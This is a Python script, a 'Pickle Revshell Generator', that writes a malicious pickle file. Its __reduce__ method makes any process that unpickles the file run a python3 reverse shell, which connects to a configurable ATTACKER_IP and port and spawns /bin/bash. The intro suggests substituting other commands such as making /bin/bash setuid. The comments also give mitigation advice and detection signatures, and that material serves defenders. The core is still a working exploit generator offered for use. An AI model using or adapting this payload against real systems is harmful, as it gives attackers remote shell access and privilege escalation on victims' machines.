Pickle Revshell Generator
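Builds a reverse shell payload for pickle deserialization: the embedded command runs in whatever process later unpickles the file, which is why `pickle.load` should only ever be given data from a trusted source.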
The variables below can be adjusted for situations that require a pickle payload.
`cmd` can be replaced with other desired commands (e.g. `chmod +s /bin/bash`).
import os
import pickle
# Connect-back endpoint that ExploitPayload.__reduce__ interpolates into its
# command string. 127.0.0.1 is the loopback address, i.e. a local test value.
ATTACKER_IP: str = "127.0.0.1"
ATTACKER_PORT: int = 6969

# Directory and file name the serialized payload is written to
# ("./" is the current working directory).
FILEPATH: str = "./"
FILENAME: str = "revshell.pickle"
class ExploitPayload:
    """Object whose pickled form is a call to ``os.system``, not instance state.

    ``pickle`` calls ``__reduce__`` while dumping and stores the returned
    ``(callable, args)`` pair. An unpickler "rebuilds" the object by calling
    ``callable(*args)``, so any process that runs ``pickle.load`` or
    ``pickle.loads`` on this data executes ``cmd`` with that process's
    privileges. This class does not need to exist on the loading side,
    because only the reference to ``os.system`` and the argument tuple are
    stored.

    Mitigation on the loading side: do not unpickle data from an untrusted
    or unauthenticated source. Where pickle cannot be avoided, subclass
    ``pickle.Unpickler`` and override ``find_class`` with an allow-list, or
    verify an HMAC over the bytes before loading. For plain data, use a
    data-only format such as JSON.
    """

    def __reduce__(self):
        """Return ``(os.system, (cmd,))`` as this object's reconstruction recipe."""
        # The f-string is evaluated when pickle calls __reduce__ (at dump
        # time), so ATTACKER_IP / ATTACKER_PORT are fixed in the written file.
        #
        # Detection view of what the string does when run: a shell launches
        # `python3 -c ...`, which connects a socket to the configured
        # endpoint, duplicates the socket onto fds 0, 1 and 2, and spawns
        # /bin/bash under a pty. An application process that spawns a shell,
        # followed by a bash whose stdio is a network socket, is the lineage
        # and file-descriptor pattern that process monitoring can alert on.
        cmd = (
            f"python3 -c 'import os,pty,socket; "
            f"sock_obj=socket.socket(); "
            f"sock_obj.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT})); "
            f"[os.dup2(sock_obj.fileno(),fd_num) for fd_num in (0,1,2)]; "
            f"pty.spawn(\"/bin/bash\")'"
        )
        return (os.system, (cmd,))
# Serialize one ExploitPayload instance to FILEPATH/FILENAME using the newest
# pickle protocol this interpreter supports.
#
# The output can be inspected without executing it: pickletools.dis() only
# lists opcodes. The stream shows a global reference to the `system` function
# (module `posix` on Linux) followed by REDUCE. An imported callable plus
# REDUCE is the signature that static pickle scanners look for.
payload_path = os.path.join(FILEPATH, FILENAME)
serialized = pickle.dumps(ExploitPayload(), protocol=pickle.HIGHEST_PROTOCOL)
with open(payload_path, "wb") as out_handle:
    out_handle.write(serialized)